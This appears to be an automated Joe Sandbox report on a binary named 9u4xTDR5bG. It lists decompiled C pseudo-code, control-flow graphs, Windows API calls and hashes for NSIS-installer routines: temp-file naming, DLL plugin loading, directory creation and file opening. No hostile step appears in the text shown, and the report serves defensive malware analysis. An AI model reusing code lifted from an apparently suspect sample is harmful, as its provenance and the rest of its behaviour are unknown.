                                                  0x73201891
                                                  0x73201886
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x73201886

                                                  APIs
                                                    • Part of subcall function 73201BFF: GlobalFree.KERNEL32 ref: 73201E74
                                                    • Part of subcall function 73201BFF: GlobalFree.KERNEL32 ref: 73201E79
                                                    • Part of subcall function 73201BFF: GlobalFree.KERNEL32 ref: 73201E7E
                                                  • GlobalFree.KERNEL32 ref: 732018C5
                                                  • FreeLibrary.KERNEL32(?), ref: 7320194B
                                                  • GlobalFree.KERNEL32 ref: 73201970
                                                    • Part of subcall function 7320243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7320246F
                                                    • Part of subcall function 73202810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73201896,00000000), ref: 732028E0
                                                    • Part of subcall function 73201666: wsprintfW.USER32 ref: 73201694
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764451858.0000000073201000.00000020.00000001.01000000.00000004.sdmp, Offset: 73200000, based on PE: true
                                                  • Associated: 00000000.00000002.764445556.0000000073200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764465355.0000000073204000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764476426.0000000073206000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73200000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                                  • String ID:
                                                  • API String ID: 3962662361-3916222277
                                                  • Opcode ID: b8800a0ca08c22af6965df5d4170f3d2bf088c5bbe48924aa3cb1883ae917f25
                                                  • Instruction ID: 66812d4ac886f257ba02ad899b424e2027bee6c1a58e47cdb5d971e0a41e8d81
                                                  • Opcode Fuzzy Hash: b8800a0ca08c22af6965df5d4170f3d2bf088c5bbe48924aa3cb1883ae917f25
                                                  • Instruction Fuzzy Hash: BE41A97960034A9BEB119F74D9C8B9937ACAF05314F188465E94B9A0C5EBB8A1CCC760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 719 40605c-406068 720 406069-40609d GetTickCount GetTempFileNameW 719->720 721 4060ac-4060ae 720->721 722 40609f-4060a1 720->722 724 4060a6-4060a9 721->724 722->720 723 4060a3 722->723 723->724
                                                  C-Code - Quality: 100%
                                                  			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                  				intOrPtr _v8;
                                                  				short _v12;
                                                  				short _t12;
                                                  				intOrPtr _t13;
                                                  				signed int _t14;
                                                  				WCHAR* _t17;
                                                  				signed int _t19;
                                                  				signed short _t23;
                                                  				WCHAR* _t26;
                                                  
                                                  				_t26 = _a4;
                                                  				_t23 = 0x64;
                                                  				while(1) {
                                                  					_t12 =  *L"nsa"; // 0x73006e
                                                  					_t23 = _t23 - 1;
                                                  					_v12 = _t12;
                                                  					_t13 =  *0x40a57c; // 0x61
                                                  					_v8 = _t13;
                                                  					_t14 = GetTickCount();
                                                  					_t19 = 0x1a;
                                                  					_v8 = _v8 + _t14 % _t19;
                                                  					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                  					if(_t17 != 0) {
                                                  						break;
                                                  					}
                                                  					if(_t23 != 0) {
                                                  						continue;
                                                  					} else {
                                                  						 *_t26 =  *_t26 & _t23;
                                                  					}
                                                  					L4:
                                                  					return _t17;
                                                  				}
                                                  				_t17 = _t26;
                                                  				goto L4;
                                                  			}












                                                  0x00406062
                                                  0x00406068
                                                  0x00406069
                                                  0x00406069
                                                  0x0040606e
                                                  0x0040606f
                                                  0x00406072
                                                  0x00406077
                                                  0x0040607a
                                                  0x00406084
                                                  0x00406091
                                                  0x00406095
                                                  0x0040609d
                                                  0x00000000
                                                  0x00000000
                                                  0x004060a1
                                                  0x00000000
                                                  0x004060a3
                                                  0x004060a3
                                                  0x004060a3
                                                  0x004060a6
                                                  0x004060a9
                                                  0x004060a9
                                                  0x004060ac
                                                  0x00000000

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 0040607A
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CountFileNameTempTick
                                                  • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                  • API String ID: 1716503409-44229769
                                                  • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                  • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                  • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                  • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 725 4020d8-4020e4 726 4021a3-4021a5 725->726 727 4020ea-402100 call 402da6 * 2 725->727 728 4022f1-4022f6 call 401423 726->728 736 402110-40211f LoadLibraryExW 727->736 737 402102-40210e GetModuleHandleW 727->737 734 402c2a-402c39 728->734 739 402121-402130 call 406979 736->739 740 40219c-40219e 736->740 737->736 737->739 744 402132-402138 739->744 745 40216b-402170 call 40559f 739->745 740->728 746 402151-402164 call 73201817 744->746 747 40213a-402146 call 401423 744->747 750 402175-402178 745->750 752 402166-402169 746->752 747->750 758 402148-40214f 747->758 750->734 753 40217e-402188 call 403b8c 750->753 752->750 753->734 757 40218e-402197 FreeLibrary 753->757 757->734 758->750
                                                  C-Code - Quality: 60%
                                                  			E004020D8(void* __ebx, void* __eflags) {
                                                  				struct HINSTANCE__* _t23;
                                                  				struct HINSTANCE__* _t31;
                                                  				void* _t32;
                                                  				WCHAR* _t35;
                                                  				intOrPtr* _t36;
                                                  				void* _t37;
                                                  				void* _t39;
                                                  
                                                  				_t32 = __ebx;
                                                  				asm("sbb eax, 0x434fc0");
                                                  				 *(_t39 - 4) = 1;
                                                  				if(__eflags < 0) {
                                                  					_push(0xffffffe7);
                                                  					L15:
                                                  					E00401423();
                                                  					L16:
                                                  					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                  					return 0;
                                                  				}
                                                  				_t35 = E00402DA6(0xfffffff0);
                                                  				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                  				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                  					L3:
                                                  					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                  					_t47 = _t23 - _t32;
                                                  					 *(_t39 + 8) = _t23;
                                                  					if(_t23 == _t32) {
                                                  						_push(0xfffffff6);
                                                  						goto L15;
                                                  					}
                                                  					L4:
                                                  					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                  					if(_t36 == _t32) {
                                                  						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                  					} else {
                                                  						 *(_t39 - 4) = _t32;
                                                  						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                  							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                  						} else {
                                                  							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                  							if( *_t36() != 0) {
                                                  								 *(_t39 - 4) = 1;
                                                  							}
                                                  						}
                                                  					}
                                                  					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                  						FreeLibrary( *(_t39 + 8));
                                                  					}
                                                  					goto L16;
                                                  				}
                                                  				_t31 = GetModuleHandleW(_t35); // executed
                                                  				 *(_t39 + 8) = _t31;
                                                  				if(_t31 != __ebx) {
                                                  					goto L4;
                                                  				}
                                                  				goto L3;
                                                  			}










                                                  0x004020d8
                                                  0x004020d8
                                                  0x004020dd
                                                  0x004020e4
                                                  0x004021a3
                                                  0x004022f1
                                                  0x004022f1
                                                  0x00402c2a
                                                  0x00402c2d
                                                  0x00402c39
                                                  0x00402c39
                                                  0x004020f3
                                                  0x004020fd
                                                  0x00402100
                                                  0x00402110
                                                  0x00402114
                                                  0x0040211a
                                                  0x0040211c
                                                  0x0040211f
                                                  0x0040219c
                                                  0x00000000
                                                  0x0040219c
                                                  0x00402121
                                                  0x0040212c
                                                  0x00402130
                                                  0x00402170
                                                  0x00402132
                                                  0x00402135
                                                  0x00402138
                                                  0x00402164
                                                  0x0040213a
                                                  0x0040213d
                                                  0x00402146
                                                  0x00402148
                                                  0x00402148
                                                  0x00402146
                                                  0x00402138
                                                  0x00402178
                                                  0x00402191
                                                  0x00402191
                                                  0x00000000
                                                  0x00402178
                                                  0x00402103
                                                  0x0040210b
                                                  0x0040210e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00000000,00425A20,7519EA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                    • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00000000,00425A20,7519EA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                    • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,00403418), ref: 004055FA
                                                    • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm4CBF.tmp\System.dll), ref: 0040560C
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                    • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                  • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 334405425-0
                                                  • Opcode ID: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                  • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                  • Opcode Fuzzy Hash: f19c79c5fba68d9d0d2f2fda6ec06f6b63f6e40353c0f80915a645696cb571d2
                                                  • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 760 4015c1-4015d5 call 402da6 call 405eb7 765 401631-401634 760->765 766 4015d7-4015ea call 405e39 760->766 768 401663-4022f6 call 401423 765->768 769 401636-401655 call 401423 call 40653d SetCurrentDirectoryW 765->769 773 401604-401607 call 405aeb 766->773 774 4015ec-4015ef 766->774 783 402c2a-402c39 768->783 769->783 786 40165b-40165e 769->786 784 40160c-40160e 773->784 774->773 777 4015f1-4015f8 call 405b08 774->777 777->773 790 4015fa-4015fd call 405a6e 777->790 788 401610-401615 784->788 789 401627-40162f 784->789 786->783 792 401624 788->792 793 401617-401622 GetFileAttributesW 788->793 789->765 789->766 795 401602 790->795 792->789 793->789 793->792 795->784
                                                  C-Code - Quality: 86%
                                                  			E004015C1(short __ebx, void* __eflags) {
                                                  				void* _t17;
                                                  				int _t23;
                                                  				void* _t25;
                                                  				signed char _t26;
                                                  				short _t28;
                                                  				short _t31;
                                                  				short* _t34;
                                                  				void* _t36;
                                                  
                                                  				_t28 = __ebx;
                                                  				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                  				_t17 = E00405EB7(_t16);
                                                  				_t32 = _t17;
                                                  				if(_t17 != __ebx) {
                                                  					do {
                                                  						_t34 = E00405E39(_t32, 0x5c);
                                                  						_t31 =  *_t34;
                                                  						 *_t34 = _t28;
                                                  						if(_t31 != _t28) {
                                                  							L5:
                                                  							_t25 = E00405AEB( *(_t36 + 8));
                                                  						} else {
                                                  							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                  							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                  								goto L5;
                                                  							} else {
                                                  								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                  							}
                                                  						}
                                                  						if(_t25 != _t28) {
                                                  							if(_t25 != 0xb7) {
                                                  								L9:
                                                  								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                  							} else {
                                                  								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                  								if((_t26 & 0x00000010) == 0) {
                                                  									goto L9;
                                                  								}
                                                  							}
                                                  						}
                                                  						 *_t34 = _t31;
                                                  						_t32 = _t34 + 2;
                                                  					} while (_t31 != _t28);
                                                  				}
                                                  				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                  					_push(0xfffffff5);
                                                  					E00401423();
                                                  				} else {
                                                  					E00401423(0xffffffe6);
                                                  					E0040653D(0x441000,  *(_t36 + 8));
                                                  					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                  					if(_t23 == 0) {
                                                  						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                  					}
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                  				return 0;
                                                  			}











                                                  0x004015c1
                                                  0x004015c9
                                                  0x004015cc
                                                  0x004015d1
                                                  0x004015d5
                                                  0x004015d7
                                                  0x004015df
                                                  0x004015e1
                                                  0x004015e4
                                                  0x004015ea
                                                  0x00401604
                                                  0x00401607
                                                  0x004015ec
                                                  0x004015ec
                                                  0x004015ef
                                                  0x00000000
                                                  0x004015fa
                                                  0x004015fd
                                                  0x004015fd
                                                  0x004015ef
                                                  0x0040160e
                                                  0x00401615
                                                  0x00401624
                                                  0x00401624
                                                  0x00401617
                                                  0x0040161a
                                                  0x00401622
                                                  0x00000000
                                                  0x00000000
                                                  0x00401622
                                                  0x00401615
                                                  0x00401627
                                                  0x0040162b
                                                  0x0040162c
                                                  0x004015d7
                                                  0x00401634
                                                  0x00401663
                                                  0x004022f1
                                                  0x00401636
                                                  0x00401638
                                                  0x00401645
                                                  0x0040164d
                                                  0x00401655
                                                  0x0040165b
                                                  0x0040165b
                                                  0x00401655
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,7519FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,7519FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                    • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                    • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                  • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                  • String ID:
                                                  • API String ID: 1892508949-0
                                                  • Opcode ID: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                  • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                  • Opcode Fuzzy Hash: 82ddaba883c43a6ad6c7d32de7d3b1a72e39ab97507aea11bcb184130d63296d
                                                  • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 69%
                                                  			E00401389(signed int _a4) {
                                                  				intOrPtr* _t6;
                                                  				void* _t8;
                                                  				void* _t10;
                                                  				signed int _t11;
                                                  				void* _t12;
                                                  				signed int _t16;
                                                  				signed int _t17;
                                                  				void* _t18;
                                                  
                                                  				_t17 = _a4;
                                                  				while(_t17 >= 0) {
                                                  					_t6 = _t17 * 0x1c +  *0x434f30;
                                                  					if( *_t6 == 1) {
                                                  						break;
                                                  					}
                                                  					_push(_t6); // executed
                                                  					_t8 = E00401434(); // executed
                                                  					if(_t8 == 0x7fffffff) {
                                                  						return 0x7fffffff;
                                                  					}
                                                  					_t10 = E0040136D(_t8);
                                                  					if(_t10 != 0) {
                                                  						_t11 = _t10 - 1;
                                                  						_t16 = _t17;
                                                  						_t17 = _t11;
                                                  						_t12 = _t11 - _t16;
                                                  					} else {
                                                  						_t12 = _t10 + 1;
                                                  						_t17 = _t17 + 1;
                                                  					}
                                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                  						 *0x433eec =  *0x433eec + _t12;
                                                  						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                  					}
                                                  				}
                                                  				return 0;
                                                  			}











                                                  0x0040138a
                                                  0x004013fa
                                                  0x0040139b
                                                  0x004013a0
                                                  0x00000000
                                                  0x00000000
                                                  0x004013a2
                                                  0x004013a3
                                                  0x004013ad
                                                  0x00000000
                                                  0x00401404
                                                  0x004013b0
                                                  0x004013b7
                                                  0x004013bd
                                                  0x004013be
                                                  0x004013c0
                                                  0x004013c2
                                                  0x004013b9
                                                  0x004013b9
                                                  0x004013ba
                                                  0x004013ba
                                                  0x004013c9
                                                  0x004013cb
                                                  0x004013f4
                                                  0x004013f4
                                                  0x004013c9
                                                  0x00000000

                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                  • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                  • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                  • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                  • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                  • Opcode Fuzzy Hash: 17fdff3635e274bccff740d5b56a6ff11ee3748df7be710f89f234bf033d1564
                                                  • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E0040690A(signed int _a4) {
                                                  				struct HINSTANCE__* _t5;
                                                  				signed int _t10;
                                                  
                                                  				_t10 = _a4 << 3;
                                                  				_t8 =  *(_t10 + 0x40a3e0);
                                                  				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                  				if(_t5 != 0) {
                                                  					L2:
                                                  					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                  				}
                                                  				_t5 = E0040689A(_t8); // executed
                                                  				if(_t5 == 0) {
                                                  					return 0;
                                                  				}
                                                  				goto L2;
                                                  			}





                                                  0x00406912
                                                  0x00406915
                                                  0x0040691c
                                                  0x00406924
                                                  0x00406930
                                                  0x00000000
                                                  0x00406937
                                                  0x00406927
                                                  0x0040692e
                                                  0x00000000
                                                  0x0040693f
                                                  0x00000000

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                    • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                    • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                    • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                  • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                  • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                  • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 68%
                                                  			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                  				signed int _t5;
                                                  				void* _t6;
                                                  
                                                  				_t5 = GetFileAttributesW(_a4); // executed
                                                  				asm("sbb ecx, ecx");
                                                  				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                  				return _t6;
                                                  			}





                                                  0x00406031
                                                  0x0040603e
                                                  0x00406053
                                                  0x00406059

                                                  APIs
